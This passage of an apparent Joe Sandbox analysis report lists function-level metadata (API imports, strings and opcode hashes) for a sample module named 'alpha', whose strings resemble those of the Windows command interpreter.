                                      • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction Fuzzy Hash: ADF1C2BBA0878389EB64EB21D8402E9ABA4FF45F4CF889530DA5E47695DF3CE544C710
                                      APIs
                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAA85
                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAACF
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAAEC
                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB39
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB6F
                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABA4
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABCB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseDeleteValue$CreateOpen
                                      • String ID: %s=%s
                                      • API String ID: 1019019434-1087296587
                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction ID: 06d47f305885bbba12c6486de8bbf13b6ca01b7b141c232c4317ce6e08b46718
                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction Fuzzy Hash: 4F51EAB7B1878386E760AB25E85477AF6E1FB89F44F885230CA5D83B94DF78D4418710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$FullNamePathwcsrchr
                                      • String ID:
                                      • API String ID: 4289998964-0
                                      • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction ID: 2bc3dc30813f671f8d3d0ba32f3f60f20a57944b64d7716b4676c0e0c261bc94
                                      • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                      • Instruction Fuzzy Hash: 1EC1E5ABB0974782EA94BB91D548379E7A0FB45F98F886530CE5E037D0DF7CA4918320
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 2081463915-1994581435
                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction ID: 7f187be84442132dabe8ac86962a60c902c156e88d21872a9b076c7b24e859c9
                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction Fuzzy Hash: 6E71A2EBE0864785FBA5BB64E454279AAE0AF01F5CFCC4939D50D426D1DF3CA481C760
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$iswspacewcschr
                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                      • API String ID: 840959033-3627297882
                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction ID: 84ccae9cf6bb8ef8ba266d600c495aba10c69bcca11557a0e2c2c3b5d9a0dc12
                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction Fuzzy Hash: 97D17DABE0864386FB50BB21E8552B9A7A0EF44F5CFCC9435CA4D86295DF3CE8458770
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA32F3
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF755CA32A4), ref: 00007FF755CA3309
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CA3384
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC11DF
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                      • String ID:
                                      • API String ID: 611521582-0
                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction ID: 2c281a3b56d7b0a81a2ee9769d386d17df84a74188b3925059ab50db176404af
                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction Fuzzy Hash: AEA1A3BBF0865386EB14AB65E8142BDEBA1FF49F5DF885135CD0E86B44DF3C94458220
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateFile_open_osfhandle
                                      • String ID: con
                                      • API String ID: 2905481843-4257191772
                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction ID: 374f612b63c3c6b251445eaf95032d11491ccb1462b95c464da7b55460eaf717
                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction Fuzzy Hash: 7471DAB7A086838AE360AF54E440679F6A0FB4AF75FD84234DA5E42794DF3CD445C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                      • String ID: CSVFS$NTFS$REFS
                                      • API String ID: 3510147486-2605508654
                                      • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                      • Instruction ID: 8999e5da9e8b63699fbe65cc9a7a1410ec433d09ddf45d9770235587c1a7e28e
                                      • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                      • Instruction Fuzzy Hash: D9616E77704BC68AEBA19F21D8443E9B7A4FB85B88F884135CA0D8B758DF78D245C710
                                      APIs
                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF755CA7279,?,?,?,?,?,00007FF755CABFA9), ref: 00007FF755CC4485
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: longjmp
                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                      • API String ID: 1832741078-366822981
                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction ID: da8f60e380d817feaad94abab3b5c6df8d613936da68d362f1436af081f7be86
                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction Fuzzy Hash: 3AC1B2EAF0C68381E664FB0591805B8A7A1BB46F8EFDDA072CD1D97691CF6CE445C320
                                      APIs
                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB6677
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB668F
                                      • _errno.MSVCRT ref: 00007FF755CB66A3
                                      • wcstol.MSVCRT ref: 00007FF755CB66C4
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66E4
                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66FE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                      • API String ID: 2348642995-441775793
                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction ID: ed0af47234d59f2dfbb3ea1ef21544d7b0fa30bcb17536f4110cc0718e4b0a73
                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction Fuzzy Hash: 16715FABD08A8785E7606F21D450179F7A0FB45FA8BDCD135DA8E56394EF3CA884C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$_wcsicmp$AllocProcess
                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                      • API String ID: 3223794493-3086019870
                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction ID: a23ddf87c2a92a25503956f8c4780e9105f9a88ccf1d372a7933706ae566c492
                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction Fuzzy Hash: EB5181ABA08B4386EA55AB15E810179BBA0FF49F58FDC9534C95E473A0DF7CE441C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                      • String ID: %s$/-.$:
                                      • API String ID: 1644023181-879152773
                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction ID: fdda612b7bf8bffc6e77382479fc40c05c868aa9cc8fe6cef8ef02a5e765e1ac
                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction Fuzzy Hash: 5191B3ABA0864391EF50EB60D4502BAE7A0FF84F98FCC5535DA5E46AD4EE3CE545C320
                                      APIs
                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CC7251), ref: 00007FF755CC628E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait
                                      • String ID: wil
                                      • API String ID: 24740636-1589926490
                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction ID: 03437a66a8acd2bce4762e13df1192df704aa7fc8dad580e00d8969e96cbdbdc
                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction Fuzzy Hash: E74165A7A0854383F3606B19E600279E6A1EF85F89FDCB131D92A866D4DF3DD4858721
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                      • String ID:
                                      • API String ID: 1397130798-0
                                      • Opcode ID: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                      • Instruction ID: bdde95152f835d40aaff380730d1de1142978b60f73817196d03b702b7c1d0d1
                                      • Opcode Fuzzy Hash: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                      • Instruction Fuzzy Hash: 5091A6ABA0878386EB65AB11D8402B9F7E1FB44F98FC88135D94D47B94DF3DD9408320
                                      APIs
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • iswspace.MSVCRT ref: 00007FF755CB7EEE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: A
                                      • API String ID: 3731854180-3554254475
                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction ID: 3c216d41d7fc8304a0a2ba7fe591fadd040aa1ba45b88cfcb13da35294e04138
                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction Fuzzy Hash: C0A17FAB90968385E660AB11A45027DF7A0FF45F98FC89138DA5D47794EF3CE442DB20
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Enum$Openwcsrchr
                                      • String ID: %s=%s$.$\Shell\Open\Command
                                      • API String ID: 3402383852-1459555574
                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
